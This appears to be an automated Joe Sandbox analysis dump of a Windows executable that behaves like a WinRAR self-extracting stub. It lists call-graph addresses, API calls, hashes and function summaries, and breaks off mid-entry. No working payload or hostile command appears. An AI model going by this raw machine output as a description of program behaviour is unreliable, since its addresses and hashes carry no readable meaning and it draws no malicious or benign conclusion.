24508->24523 24559 f4137a MultiByteToWideChar 24508->24559 24510 f3d72b 24560 f3ce72 76 API calls 24510->24560 24512 f3da0a 24565 f3ce72 76 API calls 24512->24565 24514 f3d9fa 24514->24437 24515 f3d771 24561 f55a90 26 API calls 3 library calls 24515->24561 24517 f3d742 24517->24515 24519 f43781 76 API calls 24517->24519 24518 f3d78b 24562 f55a90 26 API calls 3 library calls 24518->24562 24519->24517 24521->24493 24522 f41596 WideCharToMultiByte 24522->24523 24523->24510 24523->24512 24523->24514 24523->24521 24523->24522 24563 f3dd6b 50 API calls __vsnprintf 24523->24563 24564 f558d9 26 API calls 3 library calls 24523->24564 24527 f3d32f 24526->24527 24527->24440 24529 f399ba 24528->24529 24530 f39a39 CreateFileW 24529->24530 24531 f39aaa 24530->24531 24532 f39a59 GetLastError 24530->24532 24533 f39ae1 24531->24533 24535 f39ac7 SetFileTime 24531->24535 24534 f3b66c 2 API calls 24532->24534 24533->24492 24536 f39a79 24534->24536 24535->24533 24536->24531 24537 f39a7d CreateFileW GetLastError 24536->24537 24538 f39aa1 24537->24538 24538->24531 24539->24496 24540->24507 24542 f39e53 24541->24542 24543 f39e64 SetFilePointer 24541->24543 24544 f39e9d 24542->24544 24566 f36fa5 75 API calls 24542->24566 24543->24544 24545 f39e82 GetLastError 24543->24545 24544->24507 24545->24544 24547 f39e8c 24545->24547 24547->24544 24567 f36fa5 75 API calls 24547->24567 24550 f39c03 24549->24550 24554 f39bfc 24549->24554 24552 f39c9e 24550->24552 24550->24554 24555 f39cc0 24550->24555 24568 f3984e 24550->24568 24552->24554 24580 f36f6b 75 API calls 24552->24580 24554->24507 24555->24554 24556 f3984e 5 API calls 24555->24556 24556->24555 24557->24507 24558->24504 24559->24523 24560->24517 24561->24518 24562->24521 24563->24523 24564->24523 24565->24514 24566->24543 24567->24544 24569 f39867 ReadFile 24568->24569 24570 f3985c GetStdHandle 24568->24570 24571 f39880 24569->24571 24578 f398a0 24569->24578 24570->24569 24572 f39989 GetFileType 24571->24572 24573 f39887 24572->24573 24574 f398b7 24573->24574 24575 f398a8 GetLastError 24573->24575 24579 f39895 24573->24579 24577 f398c7 GetLastError 24574->24577 24574->24578 24575->24574 24575->24578 24576 f3984e GetFileType 24576->24578 24577->24578 24577->24579 24578->24550 24579->24576 24580->24554 24582 f57430 _abort 24581->24582 24583 f57448 24582->24583 24584 f5757e _abort GetModuleHandleW 24582->24584 24603 f5a3f1 EnterCriticalSection 24583->24603 24586 f5743c 24584->24586 24586->24583 24615 f575c2 GetModuleHandleExW 24586->24615 24587 f574ee 24604 f5752e 24587->24604 24591 f574c5 24594 f574dd 24591->24594 24598 f581f1 _abort 5 API calls 24591->24598 24592 f57537 24624 f61a19 5 API calls TranslatorGuardHandler 24592->24624 24593 f5750b 24607 f5753d 24593->24607 24599 f581f1 _abort 5 API calls 24594->24599 24598->24594 24599->24587 24600 f57450 24600->24587 24600->24591 24623 f57f30 20 API calls _abort 24600->24623 24603->24600 24625 f5a441 LeaveCriticalSection 24604->24625 24606 f57507 24606->24592 24606->24593 24626 f5a836 24607->24626 24610 f5756b 24613 f575c2 _abort 8 API calls 24610->24613 24611 f5754b GetPEB 24611->24610 24612 f5755b GetCurrentProcess TerminateProcess 24611->24612 24612->24610 24614 f57573 ExitProcess 24613->24614 24616 f575ec GetProcAddress 24615->24616 24617 f5760f 24615->24617 24622 f57601 24616->24622 24618 f57615 FreeLibrary 24617->24618 24619 f5761e 24617->24619 24618->24619 24620 f4ec4a TranslatorGuardHandler 5 API calls 24619->24620 24621 f57628 24620->24621 24621->24583 24622->24617 24623->24591 24625->24606 24627 f5a85b 24626->24627 24631 f5a851 24626->24631 24628 f5a458 __dosmaperr 5 API calls 24627->24628 24628->24631 24629 f4ec4a TranslatorGuardHandler 5 API calls 24630 f57547 24629->24630 24630->24610 24630->24611 24631->24629 24820 f4eac0 27 API calls pre_c_initialization 24870 f5ebc1 21 API calls __vswprintf_c_l 24871 f497c0 10 API calls 24822 f59ec0 21 API calls 24872 f5b5c0 GetCommandLineA GetCommandLineW 24823 f4a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24656 f579b7 24657 f5b290 51 API calls 24656->24657 24658 f579c9 24657->24658 24667 f5b610 GetEnvironmentStringsW 24658->24667 24662 f584de _free 20 API calls 24663 f57a09 24662->24663 24664 f579df 24665 f584de _free 20 API calls 24664->24665 24666 f579d4 24665->24666 24666->24662 24668 f5b627 24667->24668 24678 f5b67a 24667->24678 24671 f5b62d WideCharToMultiByte 24668->24671 24669 f5b683 FreeEnvironmentStringsW 24670 f579ce 24669->24670 24670->24666 24679 f57a0f 26 API calls 3 library calls 24670->24679 24672 f5b649 24671->24672 24671->24678 24673 f58518 __onexit 21 API calls 24672->24673 24674 f5b64f 24673->24674 24675 f5b656 WideCharToMultiByte 24674->24675 24676 f5b66c 24674->24676 24675->24676 24677 f584de _free 20 API calls 24676->24677 24677->24678 24678->24669 24678->24670 24679->24664 24824 f316b0 84 API calls 24680 f590b0 24688 f5a56f 24680->24688 24682 f590c4 24685 f590cc 24686 f590d9 24685->24686 24696 f590e0 11 API calls 24685->24696 24689 f5a458 __dosmaperr 5 API calls 24688->24689 24690 f5a596 24689->24690 24691 f5a5ae TlsAlloc 24690->24691 24694 f5a59f 24690->24694 24691->24694 24692 f4ec4a TranslatorGuardHandler 5 API calls 24693 f590ba 24692->24693 24693->24682 24695 f59029 20 API calls 2 library calls 24693->24695 24694->24692 24695->24685 24696->24682 24697 f5a3b0 24698 f5a3bb 24697->24698 24700 f5a3e4 24698->24700 24701 f5a3e0 24698->24701 24703 f5a6ca 24698->24703 24710 f5a410 DeleteCriticalSection 24700->24710 24704 f5a458 __dosmaperr 5 API calls 24703->24704 24705 f5a6f1 24704->24705 24706 f5a70f InitializeCriticalSectionAndSpinCount 24705->24706 24707 f5a6fa 24705->24707 24706->24707 24708 f4ec4a TranslatorGuardHandler 5 API calls 24707->24708 24709 f5a726 24708->24709 24709->24698 24710->24701 24825 f51eb0 6 API calls 4 library calls 24827 f576bd 52 API calls 3 library calls 24828 f396a0 79 API calls 24878 f5e9a0 51 API calls 24831 f4e4a2 38 API calls 2 library calls 24879 f52397 48 API calls 24731 f4d997 24733 f4d89b 24731->24733 24732 f4df59 ___delayLoadHelper2@8 19 API calls 24732->24733 24733->24732 24832 f47090 114 API calls 24833 f4cc90 70 API calls 24880 f4a990 97 API calls 24881 f49b90 GdipCloneImage GdipAlloc 24735 f4d891 19 API calls ___delayLoadHelper2@8 24882 f59b90 21 API calls 2 library calls 24836 f4a89d 78 API calls 24837 f3ea98 FreeLibrary 24884 f55780 QueryPerformanceFrequency QueryPerformanceCounter 24744 f31385 82 API calls 3 library calls 24839 f45c77 121 API calls __vswprintf_c_l 24842 f31075 82 API calls pre_c_initialization 22917 f4d573 22918 f4d580 22917->22918 22925 f3ddd1 22918->22925 22936 f3ddff 22925->22936 22928 f3400a 22959 f33fdd 22928->22959 22931 f4ac74 PeekMessageW 22932 f4ac8f GetMessageW 22931->22932 22933 f4acc8 22931->22933 22934 f4acb4 TranslateMessage DispatchMessageW 22932->22934 22935 f4aca5 IsDialogMessageW 22932->22935 22934->22933 22935->22933 22935->22934 22942 f3d28a 22936->22942 22939 f3de22 LoadStringW 22940 f3ddfc 22939->22940 22941 f3de39 LoadStringW 22939->22941 22940->22928 22941->22940 22947 f3d1c3 22942->22947 22944 f3d2a7 22946 f3d2bc 22944->22946 22955 f3d2c8 26 API calls 22944->22955 22946->22939 22946->22940 22948 f3d1de 22947->22948 22954 f3d1d7 _strncpy 22947->22954 22950 f3d202 22948->22950 22956 f41596 WideCharToMultiByte 22948->22956 22953 f3d233 22950->22953 22957 f3dd6b 50 API calls __vsnprintf 22950->22957 22958 f558d9 26 API calls 3 library calls 22953->22958 22954->22944 22955->22946 22956->22950 22957->22953 22958->22954 22960 f33ff4 ___scrt_initialize_default_local_stdio_options 22959->22960 22963 f55759 22960->22963 22966 f53837 22963->22966 22967 f53877 22966->22967 22968 f5385f 22966->22968 22967->22968 22970 f5387f 22967->22970 22990 f5895a 20 API calls __dosmaperr 22968->22990 22992 f53dd6 22970->22992 22971 f53864 22991 f58839 26 API calls ___std_exception_copy 22971->22991 22977 f33ffe SetDlgItemTextW 22977->22931 22978 f53907 23001 f54186 51 API calls 3 library calls 22978->23001 22981 f5386f 22983 f4ec4a 22981->22983 22982 f53912 23002 f53e59 20 API calls _free 22982->23002 22984 f4ec55 IsProcessorFeaturePresent 22983->22984 22985 f4ec53 22983->22985 22987 f4f267 22984->22987 22985->22977 23003 f4f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22987->23003 22989 f4f34a 22989->22977 22990->22971 22991->22981 22993 f53df3 22992->22993 22999 f5388f 22992->22999 22993->22999 23004 f58fa5 GetLastError 22993->23004 22995 f53e14 23025 f590fa 38 API calls __cftof 22995->23025 22997 f53e2d 23026 f59127 38 API calls __cftof 22997->23026 23000 f53da1 20 API calls 2 library calls 22999->23000 23000->22978 23001->22982 23002->22981 23003->22989 23005 f58fc7 23004->23005 23006 f58fbb 23004->23006 23028 f585a9 20 API calls 2 library calls 23005->23028 23027 f5a61b 11 API calls 2 library calls 23006->23027 23009 f58fc1 23009->23005 23011 f59010 SetLastError 23009->23011 23010 f58fd3 23012 f58fdb 23010->23012 23035 f5a671 11 API calls 2 library calls 23010->23035 23011->22995 23029 f584de 23012->23029 23014 f58ff0 23014->23012 23016 f58ff7 23014->23016 23036 f58e16 20 API calls __dosmaperr 23016->23036 23017 f58fe1 23019 f5901c SetLastError 23017->23019 23037 f58566 38 API calls _abort 23019->23037 23020 f59002 23022 f584de _free 20 API calls 23020->23022 23024 f59009 23022->23024 23024->23011 23024->23019 23025->22997 23026->22999 23027->23009 23028->23010 23030 f58512 __dosmaperr 23029->23030 23031 f584e9 RtlFreeHeap 23029->23031 23030->23017 23031->23030 23032 f584fe 23031->23032 23038 f5895a 20 API calls __dosmaperr 23032->23038 23034 f58504 GetLastError 23034->23030 23035->23014 23036->23020 23038->23034 24844 f4fc60 51 API calls 2 library calls 24846 f53460 RtlUnwind 24847 f59c60 71 API calls _free 24848 f59e60 31 API calls 2 library calls 24886 f49b50 GdipDisposeImage GdipFree pre_c_initialization 24852 f58050 8 API calls ___vcrt_uninitialize 24638 f39b59 24639 f39b63 24638->24639 24640 f39bd7 24638->24640 24641 f39bad SetFilePointer 24639->24641 24641->24640 24642 f39bcd GetLastError 24641->24642 24642->24640 24853 f4ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24854 f48c40 GetClientRect 24855 f53040 5 API calls 2 library calls 24888 f4be49 98 API calls 3 library calls 24857 f60040 IsProcessorFeaturePresent 24889 f4d34e DialogBoxParamW 24890 f4be49 103 API calls 4 library calls 24858 f4a430 73 API calls 24859 f31025 29 API calls pre_c_initialization 24717 f39f2f 24718 f39f44 24717->24718 24719 f39f3d 24717->24719 24720 f39f4a GetStdHandle 24718->24720 24727 f39f55 24718->24727 24720->24727 24721 f39fa9 WriteFile 24721->24727 24722 f39f7a 24723 f39f7c WriteFile 24722->24723 24722->24727 24723->24722 24723->24727 24725 f3a031 24729 f37061 75 API calls 24725->24729 24727->24719 24727->24721 24727->24722 24727->24723 24727->24725 24728 f36e18 60 API calls 24727->24728 24728->24727 24729->24719 24897 f36110 80 API calls 24898 f5b710 GetProcessHeap 24899 f5a918 27 API calls 3 library calls 24900 f4be49 108 API calls 4 library calls 24860 f4ea00 46 API calls 5 library calls 24901 f31f05 126 API calls __EH_prolog 24747 f4c40e 24748 f4c4c7 24747->24748 24755 f4c42c _wcschr 24747->24755 24749 f4c4e5 24748->24749 24763 f4be49 _wcsrchr 24748->24763 24782 f4ce22 24748->24782 24752 f4ce22 18 API calls 24749->24752 24749->24763 24751 f4aa36 ExpandEnvironmentStringsW 24751->24763 24752->24763 24753 f4ca8d 24754 f417ac CompareStringW 24754->24755 24755->24748 24755->24754 24757 f4c11d SetWindowTextW 24757->24763 24760 f535de 22 API calls 24760->24763 24762 f4bf0b SetFileAttributesW 24765 f4bfc5 GetFileAttributesW 24762->24765 24775 f4bf25 ___scrt_fastfail 24762->24775 24763->24751 24763->24753 24763->24757 24763->24760 24763->24762 24768 f4c2e7 GetDlgItem SetWindowTextW SendMessageW 24763->24768 24771 f4c327 SendMessageW 24763->24771 24776 f417ac CompareStringW 24763->24776 24777 f49da4 GetCurrentDirectoryW 24763->24777 24779 f3a52a 7 API calls 24763->24779 24780 f3a4b3 FindClose 24763->24780 24781 f4ab9a 76 API calls new 24763->24781 24765->24763 24767 f4bfd7 DeleteFileW 24765->24767 24767->24763 24769 f4bfe8 24767->24769 24768->24763 24770 f3400a _swprintf 51 API calls 24769->24770 24772 f4c008 GetFileAttributesW 24770->24772 24771->24763 24772->24769 24773 f4c01d MoveFileW 24772->24773 24773->24763 24774 f4c035 MoveFileExW 24773->24774 24774->24763 24775->24763 24775->24765 24778 f3b4f7 52 API calls 2 library calls 24775->24778 24776->24763 24777->24763 24778->24775 24779->24763 24780->24763 24781->24763 24784 f4ce2c ___scrt_fastfail 24782->24784 24783 f4d08a 24783->24749 24784->24783 24785 f4cf1b 24784->24785 24805 f417ac CompareStringW 24784->24805 24786 f3a180 4 API calls 24785->24786 24788 f4cf30 24786->24788 24789 f4cf4f ShellExecuteExW 24788->24789 24806 f3b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24788->24806 24789->24783 24792 f4cf62 24789->24792 24791 f4cf47 24791->24789 24793 f4cf9b 24792->24793 24794 f4cff1 CloseHandle 24792->24794 24799 f4cf91 ShowWindow 24792->24799 24807 f4d2e6 6 API calls 24793->24807 24795 f4d00a 24794->24795 24796 f4cfff 24794->24796 24795->24783 24801 f4d081 ShowWindow 24795->24801 24808 f417ac CompareStringW 24796->24808 24799->24793 24800 f4cfb3 24800->24794 24802 f4cfc6 GetExitCodeProcess 24800->24802 24801->24783 24802->24794 24803 f4cfd9 24802->24803 24803->24794 24805->24785 24806->24791 24807->24800 24808->24795 24861 f4ec0b 28 API calls 2 library calls 24903 f4db0b 19 API calls ___delayLoadHelper2@8

                  Executed Functions

                  Function 00F4D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00F400CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00F400E4
                    • Part of subcall function 00F400CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F400F6
                    • Part of subcall function 00F400CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F40127
                    • Part of subcall function 00F49DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F49DAC
                    • Part of subcall function 00F4A335: OleInitialize.OLE32(00000000), ref: 00F4A34E
                    • Part of subcall function 00F4A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F4A385
                    • Part of subcall function 00F4A335: SHGetMalloc.SHELL32(00F78430), ref: 00F4A38F
                    • Part of subcall function 00F413B3: GetCPInfo.KERNEL32(00000000,?), ref: 00F413C4
                    • Part of subcall function 00F413B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00F413D8
                  • GetCommandLineW.KERNEL32 ref: 00F4D61C
                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F4D643
                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F4D654
                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00F4D68E
                    • Part of subcall function 00F4D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F4D29D
                    • Part of subcall function 00F4D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F4D2D9
                  • CloseHandle.KERNEL32(00000000), ref: 00F4D697
                  • GetModuleFileNameW.KERNEL32(00000000,00F8DC90,00000800), ref: 00F4D6B2
                  • SetEnvironmentVariableW.KERNEL32(sfxname,00F8DC90), ref: 00F4D6BE
                  • GetLocalTime.KERNEL32(?), ref: 00F4D6C9
                  • _swprintf.LIBCMT ref: 00F4D708
                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F4D71A
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00F4D721
                  • LoadIconW.USER32(00000000,00000064), ref: 00F4D738
                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00F4D789
                  • Sleep.KERNEL32(?), ref: 00F4D7B7
                  • DeleteObject.GDI32 ref: 00F4D7F0
                  • DeleteObject.GDI32(?), ref: 00F4D800
                  • CloseHandle.KERNEL32 ref: 00F4D843
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                  • API String ID: 788466649-2656992072
                  • Opcode ID: 76f73c702049c72f0b4470e3c0405bde63e37e1948b1374aaacfe40b9491a17f
                  • Instruction ID: 08e281825af044ba9c5df395266c3ed92935244d95747fd86318bc273cebb031
                  • Opcode Fuzzy Hash: 76f73c702049c72f0b4470e3c0405bde63e37e1948b1374aaacfe40b9491a17f
                  • Instruction Fuzzy Hash: 5C61E371D40249BFD320AFA5EC49F7A3BA8AB45754F000429F949D31A2EFB8D944F762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 f49e1c-f49e38 FindResourceW 771 f49e3e-f49e50 SizeofResource 770->771 772 f49f2f-f49f32 770->772 773 f49e70-f49e72 771->773 774 f49e52-f49e61 LoadResource 771->774 776 f49f2e 773->776 774->773 775 f49e63-f49e6e LockResource 774->775 775->773 777 f49e77-f49e8c GlobalAlloc 775->777 776->772 778 f49e92-f49e9b GlobalLock 777->778 779 f49f28-f49f2d 777->779 780 f49f21-f49f22 GlobalFree 778->780 781 f49ea1-f49ebf call f4f4b0 778->781 779->776 780->779 785 f49ec1-f49ee3 call f49d7b 781->785 786 f49f1a-f49f1b GlobalUnlock 781->786 785->786 791 f49ee5-f49eed 785->791 786->780 792 f49eef-f49f03 GdipCreateHBITMAPFromBitmap 791->792 793 f49f08-f49f16 791->793 792->793 794 f49f05 792->794 793->786 794->793
                  APIs
                  • FindResourceW.KERNEL32(00F4AE4D,PNG,?,?,?,00F4AE4D,00000066), ref: 00F49E2E
                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E46
                  • LoadResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E59
                  • LockResource.KERNEL32(00000000,?,?,?,00F4AE4D,00000066), ref: 00F49E64
                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F4AE4D,00000066), ref: 00F49E82
                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00F4AE4D,00000066), ref: 00F49E93
                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F49EFC
                  • GlobalUnlock.KERNEL32(00000000), ref: 00F49F1B
                  • GlobalFree.KERNEL32(00000000), ref: 00F49F22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                  • String ID: PNG
                  • API String ID: 4097654274-364855578
                  • Opcode ID: 896d4dc60493b52d99460a5d5f6096974fb9236ca0170904ea963adb23ba2a49
                  • Instruction ID: d03ccc11ca995324098c737cd9cd5219284d470e26d9ee914551606004d6c62c
                  • Opcode Fuzzy Hash: 896d4dc60493b52d99460a5d5f6096974fb9236ca0170904ea963adb23ba2a49
                  • Instruction Fuzzy Hash: 49318171A0830AAFD7109F61DC4891BBFADFF86761B040529FC16D3260DBB6DC44AA61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 980 f3a5f4-f3a61f call f4e360 983 f3a691-f3a69a FindNextFileW 980->983 984 f3a621-f3a632 FindFirstFileW 980->984 987 f3a6b0-f3a6b2 983->987 988 f3a69c-f3a6aa GetLastError 983->988 985 f3a6b8-f3a75c call f3fe56 call f3bcfb call f40e19 * 3 984->985 986 f3a638-f3a64f call f3b66c 984->986 989 f3a761-f3a774 985->989 995 f3a651-f3a668 FindFirstFileW 986->995 996 f3a66a-f3a673 GetLastError 986->996 987->985 987->989 988->987 995->985 995->996 998 f3a675-f3a678 996->998 999 f3a684 996->999 998->999 1001 f3a67a-f3a67d 998->1001 1002 f3a686-f3a68c 999->1002 1001->999 1004 f3a67f-f3a682 1001->1004 1002->989 1004->1002
                  APIs
                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A628
                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A65E
                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A66A
                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A692
                  • GetLastError.KERNEL32(?,?,?,?,00F3A4EF,000000FF,?,?), ref: 00F3A69E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileFind$ErrorFirstLast$Next
                  • String ID:
                  • API String ID: 869497890-0
                  • Opcode ID: 3772faa530d8aca7b73fdef26cdd2d25af76461255121fadeb452338eb66cca6
                  • Instruction ID: 08e578c4824f25373b223ae7d12fccf0121f1b1d23e0c8e841843bf6cb0433ab
                  • Opcode Fuzzy Hash: 3772faa530d8aca7b73fdef26cdd2d25af76461255121fadeb452338eb66cca6
                  • Instruction Fuzzy Hash: A041A772504245AFC320EF78CCC5ADAF7E8BF49364F040929F6E9D3210D774A958AB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002,00000000), ref: 00F5755E
                  • TerminateProcess.KERNEL32(00000000,?,00F57513,00000000,00F6BAD8,0000000C,00F5766A,00000000,00000002,00000000), ref: 00F57565
                  • ExitProcess.KERNEL32 ref: 00F57577
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID:
                  • API String ID: 1703294689-0
                  • Opcode ID: 04c4d292d250e0fc0e6dfd26a4c18646a7ffe0cad92abf3700b681e951fce1fb
                  • Instruction ID: 85914d2e774edf891288d32a58a144e5cba086cce29863669f4381f137e3b509
                  • Opcode Fuzzy Hash: 04c4d292d250e0fc0e6dfd26a4c18646a7ffe0cad92abf3700b681e951fce1fb
                  • Instruction Fuzzy Hash: 6CE04631800A08ABCF11BF24ED08A493B29EB00352F148014FE158A222DB79DE4AEA50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 12f8c06f908a318838684f452d43de0fe88c8338eaa5c3e127255bb2369ebb4f
                  • Instruction ID: 60098e5ebe706de4e65aa76ed6b46f7be0ac1a1c87a8db6b50b8c51b2db801e3
                  • Opcode Fuzzy Hash: 12f8c06f908a318838684f452d43de0fe88c8338eaa5c3e127255bb2369ebb4f
                  • Instruction Fuzzy Hash: 0A821971D04345AEDF25DB70C881BFABBA9AF05360F0840B9FC599B142DB785A49EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4AEE5
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
